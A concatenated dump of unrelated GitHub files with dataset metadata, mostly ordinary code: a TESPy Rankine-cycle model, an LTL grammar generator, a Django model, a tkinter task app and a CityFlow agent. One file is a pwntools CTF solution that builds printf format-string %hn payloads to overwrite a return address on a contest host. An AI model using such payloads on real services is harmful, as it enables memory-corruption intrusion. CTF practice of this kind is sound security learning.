answer = answer[:-k]
else:
answer
return ''.join(answer)
print(solution("928857066163493066555730841879", 7)) | jungbin97/pythonworkspace | 그리디/[programmers]큰수만들기.py | [programmers]큰수만들기.py | py | 2,003 | python | ko | code | 0 | github-code | 36 |
20405571634 | from tespy.networks import Network
from tespy.components import (Turbine, Pump, Condenser, HeatExchangerSimple, CycleCloser, Source, Sink)
from tespy.connections import Connection, Bus
import matplotlib.pyplot as plt
import numpy as np
def easy_process():
# network
fluid_list = ['Water']
rankine_nw = Network(fluids=fluid_list)
rankine_nw.set_attr(T_unit='C', p_unit='bar', h_unit='kJ / kg')
# components
turb = Turbine('turbine')
cond = Condenser('condenser')
so = Source('source')
si = Sink('sink')
pump = Pump('pump')
stm_gen = HeatExchangerSimple('steam generator')
cc = CycleCloser('cycle closer')
# define connections and add to network
conn_cc_turb = Connection(cc, 'out1', turb, 'in1', label='1')
conn_turb_cond = Connection(turb, 'out1', cond, 'in1', label='2')
conn_cond_pump = Connection(cond, 'out1', pump, 'in1', label='3')
conn_pump_stm_gen = Connection(pump, 'out1', stm_gen, 'in1', label='4')
conn_stm_gen_cc = Connection(stm_gen, 'out1', cc, 'in1', label='0')
rankine_nw.add_conns(conn_cc_turb,
conn_turb_cond,
conn_cond_pump,
conn_pump_stm_gen,
conn_stm_gen_cc)
# define connections and add to network
conn_so_cond = Connection(so, 'out1', cond, 'in2', label='11')
conn_cond_si = Connection(cond, 'out2', si, 'in1', label='12')
rankine_nw.add_conns(conn_so_cond,
conn_cond_si)
# set the component and connection parameters.
# turbine
# m input, P output or the opposite
turb.set_attr(eta_s=0.9)
conn_cc_turb.set_attr(m=5, p=100, T=500, fluid={'Water': 1})
conn_turb_cond.set_attr(x=0.95)
# condenser
cond.set_attr(pr1=1, pr2=1)
conn_so_cond.set_attr(m=1000, p=1, T=20, fluid={'Water': 1})
# pump
conn_pump_stm_gen.set_attr(x=0)
stm_gen.set_attr(pr=1)
rankine_nw, powergen = assess_elect_power(rankine_nw, turb, pump)
return rankine_nw
def analyze_process():
"""
we will analyze the power production and the efficiency of the cycle, given constant steam mass flow and with
varying values for the
live steam pressure,
live steam temperature and
cooling water temperature level.
"""
# network
fluid_list = ['Water']
rankine_nw = Network(fluids=fluid_list)
rankine_nw.set_attr(T_unit='C', p_unit='bar', h_unit='kJ / kg')
# components
turb = Turbine('turbine')
cond = Condenser('condenser')
so = Source('source')
si = Sink('sink')
pump = Pump('pump')
stm_gen = HeatExchangerSimple('steam generator')
cc = CycleCloser('cycle closer')
# define connections and add to network
conn_cc_turb = Connection(cc, 'out1', turb, 'in1', label='1')
conn_turb_cond = Connection(turb, 'out1', cond, 'in1', label='2')
conn_cond_pump = Connection(cond, 'out1', pump, 'in1', label='3')
conn_pump_stm_gen = Connection(pump, 'out1', stm_gen, 'in1', label='4')
conn_stm_gen_cc = Connection(stm_gen, 'out1', cc, 'in1', label='0')
rankine_nw.add_conns(conn_cc_turb,
conn_turb_cond,
conn_cond_pump,
conn_pump_stm_gen,
conn_stm_gen_cc)
# define connections and add to network
conn_so_cond = Connection(so, 'out1', cond, 'in2', label='11')
conn_cond_si = Connection(cond, 'out2', si, 'in1', label='12')
rankine_nw.add_conns(conn_so_cond,
conn_cond_si)
# set the component and connection parameters.
# turbine
# m input, P output or the opposite
turb.set_attr(eta_s=0.90) #
conn_cc_turb.set_attr(m=10, p=150, T=600, fluid={'Water': 1}) #
conn_turb_cond.set_attr(p=0.1) #
# conn_turb_cond.set_attr(x=0.95)
# condenser
cond.set_attr(pr1=1, pr2=1, ttd_u = 10) #
conn_so_cond.set_attr( p=1.2, T=20, fluid={'Water': 1}) #
# conn_cond_si.set_attr(T=30) #
# pump
pump.set_attr(eta_s=0.75) #
# conn_pump_stm_gen.set_attr(x=0)
# steam generator
stm_gen.set_attr(pr=0.9) #
rankine_nw, powergen = assess_elect_power(rankine_nw, turb, pump)
"""
### from here starts the analysis ###
"""
data, eta, power = define_data()
""" case 1:T steam is variable. p steam and T cooling constant """
# for T in data['T_livesteam']:
# conn_cc_turb.set_attr(T=T)
# rankine_nw.solve('design')
# eta['T_livesteam'] += [abs(powergen.P.val) / stm_gen.Q.val * 100]
# power['T_livesteam'] += [abs(powergen.P.val) / 1e6]
""" case 2:T cooling is variable. T steam and p steam constant """
conn_cc_turb.set_attr(T=600)
for T in data['T_cooling']:
conn_so_cond.set_attr(T=T)
rankine_nw.solve('design')
eta['T_cooling'] += [abs(powergen.P.val) / stm_gen.Q.val * 100]
power['T_cooling'] += [abs(powergen.P.val) / 1e6]
return rankine_nw
def define_data():
data = {
'T_livesteam': np.linspace(450, 750, 7),
'T_cooling': np.linspace(15, 45, 7),
'p_livesteam': np.linspace(75, 225, 7)
}
eta = {
'T_livesteam': [],
'T_cooling': [],
'p_livesteam': []
}
power = {
'T_livesteam': [],
'T_cooling': [],
'p_livesteam': []
}
return data, eta, power
def assess_elect_power(rankine_nw, turb, pump):
powergen = Bus("electrical power output")
powergen.add_comps(
{"comp": turb, "char": 0.97, "base": "component"},
{"comp": pump, "char": 0.97, "base": "bus"},
)
# base: definition of efficiency -> see docu
# see difference between component value and bus value in results
# turbine: bus > component. mech to ele
# pump: component > bus. ele to mech
rankine_nw.add_busses(powergen)
return rankine_nw, powergen
def solve(rankine_nw):
# solve
rankine_nw.set_attr(iterinfo=False) # disable the printout of the convergence history
rankine_nw.solve(mode='design')
rankine_nw.print_results()
if __name__ =='__main__':
# rankine_nw = easy_process()
rankine_nw = analyze_process()
solve(rankine_nw)
| JubranKhattab/testing_tespy_projects | rankine_cycle.py | rankine_cycle.py | py | 6,236 | python | en | code | 0 | github-code | 36 |
74207679783 | import random
from ltl.spot2ba import Automaton
import ltl.worlds.craft_world as craft
from collections import defaultdict
# TODO: add `grass` and `toolshed` back
GRAMMAR = """
BinOp -> 'and' | 'or'
UOp -> 'do not' | 'you should not'
Not -> 'not'
Item -> 'apple' | 'orange' | 'pear'
Landmark -> 'flag' | 'house' | 'tree'
Predicate -> 'be around the' Landmark | 'be near the' Landmark | 'go to the' Landmark | 'hold the' Item | 'take the' Item | 'possess the' Item
p -> Predicate | UOp Predicate | Predicate BinOp Predicate | UOp p
S -> Safety | Guarantee | Obligation | Recurrence | Persistence | Reactivity
SPrefix -> 'always' | 'at all times,'
SSuffix -> 'forever' | 'at all times' | 'all the time'
Safety -> SPrefix p | p SSuffix | Safety BinOp Safety
GPrefix -> 'eventually' | 'at some point'
NotPredicate -> UOp Predicate
Guarantee -> GPrefix p | 'guarantee that you will' Predicate | 'guarantee that you' NotPredicate | Guarantee BinOp Guarantee
Obligation -> Safety BinOp Guarantee | Obligation BinOp Safety | Obligation BinOp Guarantee
Recurrence -> 'eventually,' p 'and do this repeatedly' | Recurrence BinOp Recurrence
Persistence -> 'at some point, start to' p 'and keep doing it' | Persistence BinOp Persistence
Reactivity -> Recurrence BinOp Persistence | Reactivity BinOp Recurrence | Reactivity BinOp Persistence
"""
#GRAMMAR = """
# BinOp -> 'and' | 'or'
# UOp -> 'do not' | 'avoid'
# Not -> 'not'
# Item -> 'apple' | 'orange' | 'pear'
# Landmark -> 'flag' | 'house' | 'tree'
# Predicate -> 'be around' Landmark | 'be near' Landmark | 'hold' Item | 'take' Item
# p -> Predicate | UOp Predicate | Predicate BinOp Predicate | UOp p
# S -> Safety | Guarantee | Obligation | Recurrence | Persistence | Reactivity
# SPrefix -> 'always'
# SSuffix -> 'forever'
# Safety -> SPrefix p | p SSuffix | Safety BinOp Safety
# GPrefix -> 'eventually' | 'at some point'
# Guarantee -> GPrefix p | 'make' Predicate 'happen' | 'make' Predicate Not 'happen' | Guarantee BinOp Guarantee
# Obligation -> Safety BinOp Guarantee | Obligation BinOp Safety | Obligation BinOp Guarantee
# Recurrence -> 'at some point,' p 'for a while' | Recurrence BinOp Recurrence
# Persistence -> 'at some point, start' p 'and keep doing it' | Persistence BinOp Persistence
# Reactivity -> Recurrence BinOp Persistence | Reactivity BinOp Recurrence | Reactivity BinOp Persistence
#"""
CLASS_LTL_PREFIX = {
'Safety': 'G ',
'Guarantee': 'F ',
'Recurrence': 'G F ',
'Persistence': 'F G '
}
class SentenceGrammar(object):
def __init__(self, recipe_path):
self._prod = defaultdict(list)
self.grammar = ''
self.create_grammar(recipe_path)
self.parse_grammar()
def create_grammar(self, recipe_path):
rules = filter(lambda x: x != '', GRAMMAR.split('\n'))
cookbook = craft.Cookbook(recipe_path)
for rule in rules:
line = ''
if (rule.split()[0] == 'Item'):
line = ' Item -> '
for primitive in cookbook.original_recipes['primitives']:
line += primitive + ' | '
line = line[:-3]
elif (rule.split()[0] == 'Landmark'):
line = ' Landmark -> '
for landmark in cookbook.original_recipes['environment']:
# TODO: This is a very hacky way to get the landmarks
if (not '_' in landmark):
line += landmark + ' | '
line = line[:-3]
else:
line = rule
self.grammar += line + '\n'
self.grammar = self.grammar[:-1]
def parse_grammar(self):
rules = filter(lambda x: x != '', self.grammar.split('\n'))
for rule in rules:
rule = rule.strip().split(' -> ')
lhs = rule[0]; rhs = rule[1]
prods = rhs.split(' | ')
for prod in prods:
self._prod[lhs].append(prod)
def gen_single_prod(self, prod, cfactor=0.25, pcount=defaultdict(int), excludes=None, negate=False):
if '\'' in prod:
tmp_tokens = filter(lambda x: x != '', prod.split('\''))
# fix for Predicate Not, TODO: find a better fix
tokens = []
for token in tmp_tokens:
if 'Not' in token:
tokens.extend(token.strip().split(' '))
else:
tokens.append(token)
else:
tokens = filter(lambda x: x != '', prod.split(' '))
out = []; formula = []; need_brackets = False
if excludes is None:
excludes = []
should_negate = 'UOp' in prod or 'Not' in prod
if should_negate: # avoid double-negate if there is one negation
excludes.extend(['UOp', 'Not'])
for token in tokens:
token = token.strip()
if token in self._prod.keys():
sentence, formula_part = self.gen_random(token, \
cfactor=cfactor, pcount=pcount, excludes=excludes, negate=should_negate)
if token in ['Item', 'Landmark']:
formula.append('( ' + ''.join(sentence.split(' ')) + ' )')
excludes.append(sentence)
elif sentence == 'and':
formula.append('&')
need_brackets = True
elif sentence == 'or':
formula.append('|')
need_brackets = True
elif token in ['UOp', 'Not']:
formula.append('!')
need_brackets = True
if token == 'Not': # swap predicate and not
formula[-1] = formula[-2]; formula[-2] = '!'
elif len(formula_part) > 0:
formula.append(formula_part)
out.append(sentence)
else:
out.append(token)
excludes = None
# combine formulas
if len(formula) > 0:
formula = ' '.join(formula)
if need_brackets:
formula = '( ' + formula + ' )'
else:
formula = ''
return ' '.join(out), formula
def _weighted_choice(self, weights):
rnd = random.random() * sum(weights)
for i, w in enumerate(weights):
rnd -= w
if rnd < 0:
return i
def gen_random(self, symbol, cfactor=0.25, pcount=defaultdict(int), excludes=None, negate=False):
sentence = ''; weights = []; formula = ''
if excludes is None:
excludes = []
for i, prod in enumerate(self._prod[symbol]):
skip = False
for token in excludes:
if token in prod:
weights.append(0.01)
skip = True
break
if skip:
continue
elif prod in pcount:
weights.append(cfactor ** (pcount[prod]))
else:
weights.append(1.0)
# sample for a production
rand_prod = self._prod[symbol][self._weighted_choice(weights)]
pcount[rand_prod] += 1
if rand_prod in self._prod.keys():
sentence, formula = self.gen_random(rand_prod, cfactor=cfactor, pcount=pcount, excludes=excludes, negate=negate)
else:
sentence, formula = self.gen_single_prod(rand_prod, cfactor=cfactor, pcount=pcount, excludes=excludes, negate=negate)
if 'UOp' not in rand_prod and 'BinOp' not in rand_prod and \
symbol in ['Safety', 'Guarantee', 'Recurrence', 'Persistence']:
formula = '( ' + CLASS_LTL_PREFIX[symbol] + formula + ' )'
# backtracking: clear the modification to pcount
pcount[rand_prod] -= 1
exclude = None
sentence = sentence.replace("to do not", "to not")
sentence = sentence.replace("to you should not", "to not")
sentence = sentence.replace("you do not be", "you not be")
return sentence, formula
def gen_sentence(self, n=1):
return [self.gen_random('S') for _ in range(n)]
if __name__ == '__main__':
grammar = SentenceGrammar()
for sentence, formula in grammar.gen_sentence(n=10):
print('Sentence:', sentence)
print(' LTL:', formula)
alphabets = ['boundary', 'C_boundary', 'tree', 'C_tree', 'house', 'C_house', 'flag', 'C_flag', 'orange', 'C_orange','apple', 'C_apple', 'pear', 'C_pear']
Automaton(formula, alphabets, add_flexible_state=False)
| czlwang/ltl-environment-dev | ltl/language/generator.py | generator.py | py | 8,694 | python | en | code | 0 | github-code | 36 |
34455554450 | # -*- coding: utf8 -*-
from django.db import models
class Timer(models.Model):
""" Модель таймера """
start_time = models.DateTimeField(
verbose_name="Время начала",
null=True,
blank=True
)
end_time = models.DateTimeField(
verbose_name="Время конца",
null=True,
blank=True
)
result_time = models.DurationField(
verbose_name="Время затраченное на задачу",
null=True,
blank=True
)
task_user = models.ForeignKey(
'TaskUser',
on_delete=models.CASCADE,
related_name='timers_task_user',
verbose_name='Задачи пользователя'
)
def __str__(self):
return f'Время начала: {self.start_time}. Время конца: {self.end_time}'
class Meta:
db_table = 'timers'
app_label = 'models_app'
verbose_name = 'Таймер'
verbose_name_plural = 'Таймеры'
| Aplles/project_tracker | models_app/models/timer/models.py | models.py | py | 1,025 | python | ru | code | 0 | github-code | 36 |
36728079897 | #!/usr/bin/env python2
from pwn import *
IP, PORT = 'pwn01.chal.ctf.westerns.tokyo', 12463
DEBUG = False
context.arch = 'x86_64'
context.aslr = False
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
def hn(prev, targ):
val = targ - prev
return (val & 0xffff) if (val & 0xffff) > 0 else 0x10000
def hhn(prev, targ):
val = targ - prev
return (val & 0xff) if (val & 0xff) > 0 else 0x100
def do_leak():
payload = ("%lx|" * 0x3f)[:-1]
p.sendline(payload)
return list(map(lambda x: int(x, 16), p.recvline(False).split('|')))
while True:
try:
# let's go gacha and :pray:
#printf_rsp = 0xdf20 # just before entering dprintf()
printf_rsp = 0x7e50
RET = printf_rsp + 0x38 # returning back to main
AGAIN_IP = 0x8E
A_pi = 18
B_pi = 46
A = printf_rsp + (A_pi - 5) * 8 # 18$
B = printf_rsp + (B_pi - 5) * 8 # 46$
fd_ofs = 0x4c
def flip_ret():
payload = "%c"*(A_pi - 2) + f"%{hn((A_pi - 2), A)}c"
payload += "%hn"
payload += "%c"*(B_pi - A_pi - 2) + f"%{hn((B_pi - A_pi - 2) + A, RET)}c"
payload += "%hn"
payload += f"%{hhn(RET, AGAIN_IP)}c%{A_pi}$hhn"
assert(len(payload) < 200)
print(payload+'\n' + str(len(payload)))
def write_ret(ofs, val):
C = printf_rsp + ofs
truect = 0 # manage this value, since we're using %hhn -> %hn
payload = "%c"*(A_pi - 2) + f"%{hhn((A_pi - 2), AGAIN_IP)}c"
payload += "%hhn"
truect += (A_pi - 2) + hhn((A_pi - 2), AGAIN_IP)
payload += "%c"*(B_pi - A_pi - 2) + f"%{hn((B_pi - A_pi - 2) + truect, C)}c"
payload += "%hn"
truect += (B_pi - A_pi - 2) + hn((B_pi - A_pi - 2) + truect, C)
payload += f"%{hhn(truect, val)}c%{A_pi}$hhn"
truect += hhn(truect, val)
payload += f"%{hn(truect, RET)}c%{B_pi}$hn"
assert(len(payload) < 200)
print(payload+'\n' + str(len(payload)))
def leak_ret():
payload = "%16lx|"*0x17
payload += f"%{hhn(17*0x17, AGAIN_IP)}c%{A_pi}$hhn"
assert(len(payload) < 200)
p.sendline(payload)
res = list(map(lambda x: int(x, 16), p.recvuntil('done.\n', True).split('|')[:0x17]))
return res
flip_ret()
write_ret(fd_ofs, 1)
break
except EOFError:
log.warning('retry')
p.close()
continue
except KeyboardInterrupt:
break
| Aleks-dotcom/ctf_lib_2021 | Zh3ro_ctf/pwn/More_printf/public/vuln/randomsol.py | randomsol.py | py | 2,746 | python | en | code | 1 | github-code | 36 |
70593996584 | import math
import os
from itertools import count, cycle
import json
#MUST BE INSTALLED VIA PIP
import tkinter
from tkinter import *
from tkinter import messagebox
from PIL import Image, ImageTk
#-------------------------------------------------------------------------------
#!--- VARS FOR QUESTY STUFF
# goat gifs
# Sprite paths for the pet goat; a fancier outfit is shown at higher levels
# (level brackets: 1-3, 4-6, 7+ -- see below and check_xp()).
goat1 = "./goats/goat1.gif"
goat2 = "./goats/goat2.gif"
goat3 = "./goats/goat3.gif"
current_goat = goat1
# Import Json file to stats
# Load the saved player stats (level / xp / xp requirement) from disk.
# NOTE(review): paths are relative, so the app presumably must be launched
# from its own folder -- confirm.
with open("stats.json") as stats_file:
    stat_import = json.load(stats_file)
current_level = stat_import["current_level"]
current_xp = stat_import["current_xp"]
# XP needed for the next level, scaled by the current level.
# NOTE(review): add_task() saves the already-scaled needed_xp back to
# stats.json, so this multiplication looks like it re-scales the value on
# every launch -- confirm whether that is intended.
needed_xp = stat_import["needed_xp"] * math.ceil(current_level/2)
# Check goat clothes
# Pick the goat sprite matching the saved level bracket.
if current_level <=3:
    current_goat = goat1
elif current_level >=4 and current_level <=6:
    current_goat = goat2
else:
    current_goat = goat3
#DEBUG print(current_goat)
#-------------------------------------------------------------------------------
#!--- ALLOW ANIMATED GIFS
class ImageLabel(tkinter.Label):
    """A tkinter Label that can play an animated GIF.

    load() pre-renders every frame to a PhotoImage; playback is driven by
    tkinter's after() timer via next_frame().
    """
    def load(self, im):
        """Load an image (a PIL Image or a file path) and start playback.

        Multi-frame GIFs animate automatically; single-frame images are
        simply displayed once.
        """
        if isinstance(im, str):
            im = Image.open(im)
        frames = []
        try:
            # PIL exposes GIF frames through seek(); seeking past the last
            # frame raises EOFError, which ends the collection loop.
            for i in count(1):
                frames.append(ImageTk.PhotoImage(im.copy()))
                im.seek(i)
        except EOFError:
            pass
        self.frames = cycle(frames)
        try:
            self.delay = im.info['duration']
        except KeyError:
            # Not every GIF stores a per-frame duration; default to 100 ms.
            # (Was a bare `except:`, which would also have swallowed
            # KeyboardInterrupt/SystemExit.)
            self.delay = 100
        if len(frames) == 1:
            self.config(image=next(self.frames))
        else:
            self.next_frame()
    def unload(self):
        """Stop the animation and clear the displayed image."""
        # Use "" rather than None: tkinter silently drops configure options
        # whose value is None, so config(image=None) never cleared anything.
        self.config(image="")
        self.frames = None
    def next_frame(self):
        """Show the next frame and reschedule after the frame delay."""
        if self.frames:
            self.config(image=next(self.frames))
            self.after(self.delay, self.next_frame)
#-------------------------------------------------------------------------------
#!--- FUNCTIONS
# Get correct list from selected dropdown option
def display_list(choice):
    """Load the tasks of the list picked in the dropdown into the listbox.

    Invoked by the OptionMenu whenever the selection changes.  Updates the
    module-level file_to_open / current_tasklist so that the add, delete
    and save handlers operate on the newly selected list instead of the
    one that was open at startup (previously these were assigned as locals,
    silently shadowing the globals).
    """
    global file_to_open, current_tasklist
    choice = dropdown_var.get()
    print(choice)
    # Grab tasks from text file.  The dropdown shows "my list" for a file
    # named "my_list.txt" (underscores are swapped for spaces when the menu
    # is built), so the underscores must be restored to form the path.
    file_to_open = "lists/" + choice.replace(" ", "_") + ".txt"
    print(file_to_open)
    with open(file_to_open, "r") as tasklist_file:
        current_tasklist = tasklist_file.read().splitlines()
    # Replace the listbox contents with the freshly loaded tasks
    # (entries get a single leading space for visual padding).
    task_list.delete(0, END)
    for task in current_tasklist:
        task_list.insert(END, " " + task)
# Checks current experience gain against required XP to level
def check_xp():
    """Level the player up once enough XP has been banked.

    On a level-up: reset the XP counter, raise the XP requirement, and swap
    in the goat sprite for the new level bracket.  Always prints the
    current stats afterwards.
    """
    global current_level
    global current_xp
    global needed_xp
    global current_goat
    if current_xp >= needed_xp:
        current_level += 1
        current_xp = 0
        # The XP requirement grows with the new level.
        needed_xp = 5 + current_level * math.ceil(current_level / 2)
        # Outfit brackets: levels 1-3, 4-6, and 7+.
        current_goat = goat1 if current_level <= 3 else goat2 if current_level <= 6 else goat3
        # Rebuild the goat's animation frames from the (possibly new) gif.
        goat_img.configure(image=None)
        goat_img.configure(goat_img.load(current_goat))
        print(current_goat)
    print(current_level, " ", current_xp, " ", needed_xp)
#!--- BUTTON BEHAVIOURS
# Add a new task
def add_task():
    """Add the text in the entry box as a new task and award one XP.

    Persists the updated stats to stats.json and refreshes the on-screen
    stat read-outs; shows a warning instead when the entry box is empty.
    """
    global current_xp
    task = new_entry.get()
    if not task:
        messagebox.showwarning("warning", "Please enter a task!")
    else:
        current_xp += 1
        task_list.insert(END, " " + task)
        new_entry.delete(0, "end")
        current_tasklist.append(task)
        check_xp()
        # Persist the progress so it survives a restart.
        with open("stats.json", "w") as outfile:
            json.dump({"current_level": current_level,
                       "current_xp": current_xp,
                       "needed_xp": needed_xp}, outfile)
    # Refresh the stat read-outs whether or not a task was added.
    stat_canvas.itemconfig(lvl_info, text=current_level)
    stat_canvas.itemconfig(xp_info, text=current_xp)
    stat_canvas.itemconfig(needed_info, text=needed_xp - current_xp)
# Delete highlighted task
def del_task():
    """Remove the highlighted task from the listbox and from current_tasklist."""
    selection = task_list.curselection()
    if not selection:
        # Nothing highlighted: Listbox.get would raise, so warn instead.
        messagebox.showwarning("warning", "Please select a task!")
        return
    # Listbox entries are stored as " " + task (one padding space), so drop
    # that single character to recover the raw task text.  (The old code
    # checked whether the padded text was a substring of the raw text --
    # always false -- so deleted tasks were never removed from the list
    # that gets saved.)
    target = task_list.get(selection[0])[1:]
    task_list.delete(selection[0])
    current_tasklist[:] = [task for task in current_tasklist if task != target]
# Save task list
def save_list():
    """Write the in-memory task list back to the currently open list file,
    one task per line."""
    with open(file_to_open, "w") as outfile:
        outfile.writelines(task + "\n" for task in current_tasklist)
#-------------------------------------------------------------------------------
#!!!!!!!!!--- TKINTER LOOP FROM UNDER HERE
# Module-level UI construction.  NOTE(review): `display_list`, `check_xp`,
# `ImageLabel`, `current_goat`, `current_level`, `current_xp` and `needed_xp`
# are defined earlier in this file (outside this excerpt) -- confirm there.
# Set up our main window
task_win = Tk()
#!--- WINDOW WIDTH, HEIGHT, XPOS, YPOS, TITLE, AND DISABLE RESIZE ---
task_win.geometry('450x600+500+200')
task_win.title('Task Quest')
task_win.resizable(width = False, height = False)
#!--- BG UI GFX ---
ui_bg = PhotoImage(file="ui/ui_bg.png")
label1 = Label(task_win, image = ui_bg, borderwidth = 0)
label1.place(x = 0, y = 0)
#!--- DROPODOWN MENU ---
# Dropdown of lists: every lists/*.txt file becomes a selectable task list.
dirListing = os.listdir("lists/")
detected_files = []
for item in dirListing:
    if ".txt" in item:
        detected_files.append(item.replace(".txt",""))
#DEBUG print(detected_files)
# Create a new list with any underscores and file extensions stripped by this point
avail_lists = [s.replace("_"," ") for s in detected_files]
dropdown_var = StringVar(task_win)
dropdown_var.set(avail_lists[0]) # default dropdown value
dropdown_lists = OptionMenu(task_win, dropdown_var, *avail_lists,command=display_list)
# Dropdown Styling
dropdown_lists["highlightthickness"]=0
dropdown_lists["width"]=7
# Placement of element
dropdown_lists.place(x=19, y=112)
#!--- OPEN DEFAULT FILE
choice = dropdown_var.get()
file_to_open = "lists/" + choice + ".txt"
#DEBUG print(file_to_open)
with open(file_to_open,"r") as tasklist_file:
    current_tasklist = tasklist_file.read().splitlines()
#!--- MAIN FRAME SET UP FOR LIST BOX AND SCROLLBAR
frame = Frame(task_win)
frame.place(x=137,y=112)
#!--- LIST BOX
# List box for our tasks to go live in
task_list = Listbox(frame,width=30,height=17,font=('Arial',12),bd=0,bg="#283189",fg="#FFFFFF",highlightthickness=0,selectbackground="#191e51",activestyle="none")
task_list.pack(side=LEFT,fill= BOTH)
# Insert tasks into list box from our task list created from the text file
for i in current_tasklist:
    task_list.insert(END,"    " + i)
#!--- SCROLLBAR
# Vertical scrollbar for longer to-do lists
tasklist_sb = Scrollbar(frame)
tasklist_sb.pack(side=RIGHT,fill=BOTH)
# Bind the scrollbar and list box together
task_list.config(yscrollcommand=tasklist_sb.set)
tasklist_sb.config(command=task_list.yview)
#!--- NEW ENTRIES
new_entry = Entry(task_win,font=("Arial",11),width=28)
new_entry.place(x=195,y=470)
#!--- BUTTONS
y_shift = 518
butt_width = 8
# Add task button
add_task_btn= Button(task_win,text='Add',font=("Arial",11),bg="#b4ea66",padx=2,pady=0,width=butt_width,command=add_task)
add_task_btn.place(x=133,y=y_shift)
# Delete task button
del_task_btn = Button(task_win,text='Delete',font=("Arial",11),bg="#940345",fg="white",padx=2,pady=0,width=butt_width,command=del_task)
del_task_btn.place(x=240,y=y_shift)
# Save tasks button
save_task_btn= Button(task_win,text='Save',font=("Arial",11),bg="#ffc96f",padx=2,pady=0,width=butt_width,command=save_list)
save_task_btn.place(x=347,y=y_shift)
#!--- GOAT MANAGEMENT <3
goat_x = 10
goat_y = 450
goat_img = ImageLabel(task_win,bd=0)
goat_img.place(x=goat_x,y=goat_y)
# Goat stats
stat_canvas = Canvas(task_win,width=107,height=150,bd=-2)
stat_canv_image = PhotoImage(file="./ui/stats_canv.png")
stat_canvas.place(x=7,y=300)
stat_canvas.create_image(0,0,image=stat_canv_image,anchor=NW)
# Text item ids kept so callbacks can itemconfig() the numbers later.
lvl_info = stat_canvas.create_text(53,37,font=("Arial",14),fill="White",text=current_level)
xp_info = stat_canvas.create_text(53,82,font=("Arial",14),fill="White",text=current_xp)
needed_info = stat_canvas.create_text(53,123,font=("Arial",14),fill="White",text=needed_xp)
# Refresh the goat
goat_img.load(current_goat)
# Yay it works~
task_win.mainloop() | introvertices/Task-list | main.py | main.py | py | 8,432 | python | en | code | 0 | github-code | 36 |
6395338624 | from intersection import Movement, Phase
import numpy as np
import random
class Agent:
    """
    The base class of an Agent; Learning and Analytical agents derive from it.
    Defines the methods used by both types of agents to wrap one intersection
    of the CityFlow simulation (movements, phases, observations, rewards).
    """
    def __init__(self, eng, ID):
        """
        initialises the Agent
        :param eng: the cityflow simulation engine
        :param ID: the unique ID of the agent corresponding to the ID of the intersection it represents
        """
        self.ID = ID
        self.movements = {}
        self.phases = {}
        self.clearing_phase = None
        self.total_rewards = 0
        self.reward_count = 0
        self.action_freq = 10
        self.action_type = "act"
        self.clearing_time = 2
        self.init_movements(eng)
        self.init_phases(eng)
        # Fixed seed so the randomly chosen starting phase is reproducible.
        random.seed(2)
        self.phase = Phase(ID=random.choice(list(self.phases.keys())))
        self.action = self.phase
        # Flatten the per-movement lane lists into de-duplicated sets.
        self.in_lanes = [x.in_lanes for x in self.movements.values()]
        self.in_lanes = set([x for sublist in self.in_lanes for x in sublist])
        self.out_lanes = [x.out_lanes for x in self.movements.values()]
        self.out_lanes = set([x for sublist in self.out_lanes for x in sublist])
    def init_movements(self, eng):
        """
        initialises the movements of the Agent based on the lane links extracted from the simulation roadnet
        the eng.get_intersection_lane_links used in the method takes the intersection ID and returns
        a tuple containing the (in_road, out_road) pair as the first element and
        (in_lanes, out_lanes) as the second element
        :param eng: the cityflow simulation engine
        """
        self.in_lanes_length = {}
        self.out_lanes_length = {}
        for idx, roadlink in enumerate(eng.get_intersection_lane_links(self.ID)):
            lanes = roadlink[1][:]
            in_road = roadlink[0][0]
            out_road = roadlink[0][1]
            in_lanes = tuple(set([x[0] for x in lanes]))
            out_lanes = [x[1] for x in lanes]
            # NOTE(review): lane_length/out_lane_length keep only the LAST
            # lane's length from each loop -- presumably all lanes of a road
            # share one length; confirm against the roadnet data.
            for lane, length in eng.get_road_lanes_length(in_road):
                lane_length = length
                self.in_lanes_length.update({lane : length})
            for lane, length in eng.get_road_lanes_length(out_road):
                out_lane_length = length
                self.out_lanes_length.update({lane : length})
            max_in_speed = eng.get_road_max_speed(in_road)
            max_out_speed = eng.get_road_max_speed(out_road)
            new_movement = Movement(idx, in_road, out_road, in_lanes, out_lanes, lane_length, out_lane_length, max_in_speed, max_out_speed, clearing_time=self.clearing_time)
            self.movements.update({roadlink[0] : new_movement})
    def init_phases(self, eng):
        """
        initialises the phases of the Agent based on the intersection phases extracted from the simulation data
        :param eng: the cityflow simulation engine
        """
        for idx, phase_tuple in enumerate(eng.get_intersection_phases(self.ID)):
            phases = phase_tuple[0]
            types = phase_tuple[1]
            empty_phases = []
            new_phase_moves = []
            for move, move_type in zip(phases, types):
                key = tuple(move)
                self.movements[key].move_type = move_type
                new_phase_moves.append(self.movements[key].ID)
            if types and all(x == 1 for x in types): #1 -> turn right
                self.clearing_phase = Phase(idx, new_phase_moves)
            if new_phase_moves:
                # Only keep phases with a unique set of movements.
                if set(new_phase_moves) not in [set(x.movements) for x in self.phases.values()]:
                    new_phase = Phase(idx, new_phase_moves)
                    self.phases.update({idx : new_phase})
            else:
                empty_phases.append(idx)
            if empty_phases:
                # A phase with no movements acts as the all-red clearing phase.
                self.clearing_phase = Phase(empty_phases[0], [])
                self.phases.update({empty_phases[0] : self.clearing_phase})
        # Re-key self.movements by movement ID instead of (in_road, out_road).
        temp_moves = dict(self.movements)
        self.movements.clear()
        for move in temp_moves.values():
            move.phases = []
            self.movements.update({move.ID : move})
        # Back-link each movement to the phases that enable it.
        for phase in self.phases.values():
            for move in phase.movements:
                if phase.ID not in self.movements[move].phases:
                    self.movements[move].phases.append(phase.ID)
    def init_neighbours(self, agents):
        """
        initiates the self.neighbours list of the agent, making it possible for it to access its neighbours
        :param agents: the list of all agents in the simulation
        """
        self.neighbours = []
        self.neighbours_lanes_dict = {}
        for agent in agents:
            # Upstream neighbours: their outgoing lanes feed our incoming lanes.
            if agent.ID != self.ID and agent.ID not in [x.ID for x in self.neighbours]:
                for lane in self.in_lanes:
                    if lane in agent.out_lanes:
                        if agent not in self.neighbours:
                            self.neighbours.append(agent)
                        if agent.ID not in self.neighbours_lanes_dict.keys():
                            self.neighbours_lanes_dict.update({agent.ID : [lane]})
                        else:
                            self.neighbours_lanes_dict[agent.ID].append(lane)
            # Downstream neighbours not already found above.
            # NOTE(review): the extra `lane in agent.out_lanes` nesting looks
            # suspicious (it requires the lane to be both in and out of the
            # neighbour) -- confirm this is intended.
            if agent.ID != self.ID and agent.ID not in [x.ID for x in self.neighbours]:
